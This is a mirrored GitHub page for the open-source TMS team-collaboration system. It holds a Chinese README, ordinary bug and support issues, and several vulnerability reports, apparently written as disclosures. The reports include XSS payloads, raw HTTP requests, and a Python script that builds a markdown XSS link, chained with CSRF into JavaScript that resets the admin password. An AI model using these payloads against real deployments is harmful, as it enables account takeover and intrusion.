xiweicheng / tms Goto Github PK

View Code? Open in Web Editor NEW

342.0 28.0 103.0 63.47 MB

基于频道模式的团队沟通协作+轻量级任务看板，支持mardown、富文本、在线表格和思维导图的团队博文wiki，i18n国际化翻译管理的响应式web开源团队协作系统。

Home Page: https://gitee.com/xiweicheng/tms/wikis/Home

License: MIT License

Java 14.19% CSS 25.13% JavaScript 48.91% HTML 11.32% Shell 0.04% Dockerfile 0.01% Less 0.09% SCSS 0.31%

slack gitter chat group translation translate webchat tms blog markdown

tms's Introduction

TMS(Teamwork Management System)

TMS是基于频道模式的团队沟通协作+轻量级任务看板，支持mardown、富文本、在线表格和思维导图的团队博文wiki，i18n国际化翻译管理的响应式web开源团队协作系统。

代码仓库:

gitee：https://gitee.com/xiweicheng/tms
github：https://github.com/xiweicheng/tms

前端代码仓库（代码已经压缩打包到tms仓库中）：

沟通博文：https://gitee.com/xiweicheng/tms-frontend
着陆首页：https://gitee.com/xiweicheng/tms-landing

操作手册

TMS用户手册（使用指导）

如何运行

Image show

着陆页
沟通
博文
i18n国际化翻译

GIF show

着陆页

国际化翻译

团队沟通

团队博文(wiki)

移动端响应式设计

具有以下功能:

团队协作沟通功能(类似于slack bearychat)
团队博文(wiki) 类似精简版confluence 蚂蚁笔记
国际化翻译管理.

沟通功能（基于websocket实时通讯）

频道(组团沟通)（二级话题消息沟通）
私聊(一对一)
markdown语法支持(内容排版不再单调)
@消息收藏消息富文本消息目录
频道外链（便于团队将常用链接统一到一处）
频道甘特图（方便项目整体规划管理）
频道任务看板（可拖拽）
频道固定消息
日程安排(提醒)
待办事项
沟通消息标记表情&标签（方便分类过滤检索）
剪贴板上传图片, 拖拽文件上传(就是这么便捷)
文件上传，从csv、excel导入mardown表格
邮件通知、桌面通知、toastr通知(不用担心错过什么)
热键支持(鼠标点多了也累不是)
自定义皮肤色调
自定义频道组（方便批量一次性@一类多个人）
更多贴心便捷操作等你发现

团队博文(wiki)

博文空间(便于博文组织,权限隔离)
Markdown、Html富文本、电子表格、思维导图、图表工具多种类型博文创作方式
基于博文模板创建（可自由发布私有、公开的模板）
博文目录（支持拖拽排序）、标签
父子级博文（支持五级父子博文）
博文关注,收藏,历史（版本比较、回退）,权限,点赞,分享,开放游客访问
博文评论
博文多人协作编辑（需开启博文协助权限）
导出 pdf、markdown、html、excel、png
基于websocket的博文更新实时通知（协作更及时便捷）
完整的博文操作变更历史审计和通知消息中心
更多贴心便捷操作等你发现

国际化（i18n）翻译管理

包括以下核心功能模块

翻译项目管理
翻译语言管理
翻译导入导出
翻译管理

其他功能

系统设置
用户管理

赞助

或者通过项目提供的赞助入口赞助.

免责声明

TMS项目中使用了不少很棒的第三方的开源依赖库，如果计划将本TMS软件用于商业通途，可能部分依赖库涉及到版权授权和付费购买问题，请自行联系并且购买相关依赖库的版本授权License，对于可能发生的版权纠纷和侵权等问题，TMS软件在此声明将不承担任何法律责任，在此感谢您对于对于TMS的喜爱和鼓励，谢谢！

许可(license)

MIT

tms's People

Contributors

Stargazers

Watchers

Forkers

jzxyouok liqqiang zhoudaqing guoweinan1998 jnan88 xuegangwu2016 zhangjingpu rufengnanren chergen bobo41 weizai118 moyansen venus-team fashtimedotcom jangocheng biiliwuiid cifaz imlifengfeng verseboys craigwu9 liliang8858 jangocity cnjswwxbtcc yt-tech davidmr001 sichitong hangpengyue deepbreath jamesliandroid narci2010 inrg pandboy skymysky woodshope haxine huangweiboy rongyousu xiaoxiaopan118 tianbaolin loveslikey pangfufu kinkir nazicc jbzhang99 yangphere jaylinlee mcsoftwareforpersonal xintao222 jiniaoxu iamxiaoma hejing1212 squall140 jjzhoujun seagulltoad anson-oldtime junmamba twosilly soon365 liyang-love bllxk nothbar doris2013 hhhcommon jaiminpan leeyouge dwtcourses wangyong00 wangjun-tino roycefan wangscript007 woaini521 leizeonban joncv cooship pgy866 bellmit daodol shean023 00mjk huluohu likeshan168 bright92 iqiuyu-0821 rocklee-1998 hzsrc luocao seaskydl xttank songyanbo poundhu weizx208 keyzf 8pig leexyan alengran dahezi999 he-zhimin david0718 yinglanxing senses1

tms's Issues

There is a cross site scripting vulnerability exists in tms

[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1
Host: localhost:8080
Content-Length: 113
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594
Connection: close

host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=

[Attack Type]
Remote

[Impact Code execution]
true

[Vulnerability proof]
1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface

2.Enter JS code in the form: <script> alert ("XSS") </script >

3.Click Save to trigger a pop-up window, and the loophole reappearance is completed.

4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

关于label标签处理

目前，发现两个关于label标签的问题，如下

每次导入翻译，新增标签时，数据库会同时创建两条相同的标签数据，原因是importController中执行了add和update两个方法导致的，不知道这里是否需要添加判断？

     translate.setUpdateDate(new Date());
     translate.setUpdater(WebUtil.getUsername());

     Label label = new Label();
     label.setCreateDate(new Date());
     label.setCreator(WebUtil.getUsername());
     label.setName(updateLabel);
     label.setStatus(Status.New);
     label.setTranslate(translate);

     lblUpdated.add(label);

     translate.getLabels().add(label);

     translate.setSearch(translate.toString());
 }

 Mail mail2 = Mail.instance();

 if (lblUpdated.size() > 0) {
     labelRepository.save(lblUpdated);
     labelRepository.flush();

     mail2.addHref("更新", baseURL, translateAction, projectId,
             updateLabel);
 }

 translateRepository.save(translates3);
 translateRepository.flush();

 // 只有新建的会打标签
 String[] lbls = new String[0];
 if (StringUtil.isNotEmpty(labels)) {
     lbls = labels.split(",");
 }

 List<Translate> translates = translateRepository.save(translates2);
 translateRepository.flush();

 // 新建的翻译打标签
 String newLabel = "N" + DateUtil.format(new Date(), DateUtil.FORMAT8);
 List<Label> lblNew = new ArrayList<>();
 // 新建的翻译设置search属性
 for (Translate translate : translates) {

     Label label = new Label();
     label.setCreateDate(new Date());
     label.setCreator(WebUtil.getUsername());
     label.setName(newLabel);
     label.setStatus(Status.New);
     label.setTranslate(translate);

     lblNew.add(label);

     translate.getLabels().add(label);

     Set<Label> labels2 = new HashSet<>();
     for (String lbl : lbls) {
         Label label2 = new Label();
         label2.setCreateDate(new Date());
         label2.setCreator(WebUtil.getUsername());
         label2.setName(lbl);
         label2.setStatus(Status.New);
         label2.setTranslate(translate);

         labels2.add(label2);
     }
     labelRepository.save(labels2);
     labelRepository.flush();

     translate.getLabels().addAll(labels2);

     translate.setSearch(translate.toString());

     log(Action.Create, Target.Translate, translate.getId());
 }

 translateRepository.save(translates2);
 translateRepository.flush();`

翻译查找页面，手动删除某条翻译的label标签时，刷新页面，页面会报错，应该是数据库翻译字段无法找到相应标签导致，建议增加容错机制，或者添加删除标签权限管理

docker-compose up -d need docker login

root@cloudcone:~/tms# docker-compose up -d
Pulling db (xiwc/tms-mysql:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.

Continue with the new image? [yN]y
Pulling db (xiwc/tms-mysql:)...
ERROR: pull access denied for xiwc/tms-mysql, repository does not exist or may require 'docker login'

tinymce

Markdown感觉有点弱，界面跟confluence有点像，但是编辑器实在。。
、前端这快是啥框架。。。感觉不太好改啊，想把 tinymce引入进来，作者指点1下？

There are cross site scripting vulnerabilities exist in tms

[Suggested description]
I found many cross site scripting(XSS) vulnerabilities exists in tms (markdown XSS). Every edit or comment page with markdown may has this vulnerability. It's too many to list.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[vulnerability proof]
Every markdown pages may has XSS. Here I choose this page:
http://localhost:8080/page/index.html#/chat/@super

Enter the poc here and send the message.

[click here](javascript:{onerror=eval}throw'=eval\x28String.fromCharCode\x2897,108,101,114,116,40,49,41\x29\x29')

The broswer alert 1

[Exploit scripts]:
code = """alert(1)""" # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

[Repair Suggestion]
Change another Markdown component, or add a filter in backend to check XSS attack when storing into MySQL.

[With CSRF vulnerability]
There is a CSRF vulnerability, we could use xss + csrf to change Admin's password.
This is the update password http package:

POST /admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 32
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: /
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099; JSESSIONID=9F0DF9ABD117D0289143D1B75E19E15A; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1701867716
Connection: close

username=super&password=12345678

Exploit script here:

code = """var xhr = new XMLHttpRequest();
var url = 'http://localhost:8080/admin/user/update2';
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE) {
if (xhr.status === 200) {
console.log('success!');
console.log(xhr.responseText);
} else {
console.error('failed' + xhr.status);
}
}
};
xhr.open('POST', url, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var postData = 'username=super&password=hacker123';
xhr.send(postData);""" # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

Send the message and open the console. Click the message.

Logout and relogin, the password has changed!

性能问题

有没有发现搭建后的网站经常会很卡，我搭建在阿里云2c4g上，没做内存cpu限制；但是习惯性登不进去网页，总是卡在ws连接一个页面。这块对机器性能有要求吗？

登陆问题

有没有管理员账户？注册必须可以不可以不写邮箱？注册提示邮箱异常失败

There is a Insecure Permissions vulnerability exists in tms

[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type]
Remote

[Vulnerability proof]

1.Access with test account http://localhost:8080/tms/admin

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.

Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.

4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.

5.Modify the packet capture data, as shown in the following figure.

6.Click forwad to finish the modification.

The information of viewing admin has changed.Vulnerability recurrence completed.

xiweicheng / tms Goto Github PK

tms's Introduction

TMS(Teamwork Management System)

操作手册

如何运行

Image show

GIF show

具有以下功能:

沟通功能（基于websocket实时通讯）

团队博文(wiki)

国际化（i18n）翻译管理

其他功能

赞助

免责声明

许可(license)

tms's People

Contributors

Stargazers

Watchers

Forkers

tms's Issues

[With CSRF vulnerability] There is a CSRF vulnerability, we could use xss + csrf to change Admin's password. This is the update password http package:

username=super&password=12345678

Recommend Projects

Recommend Topics

Recommend Org

[With CSRF vulnerability]
There is a CSRF vulnerability, we could use xss + csrf to change Admin's password.
This is the update password http package: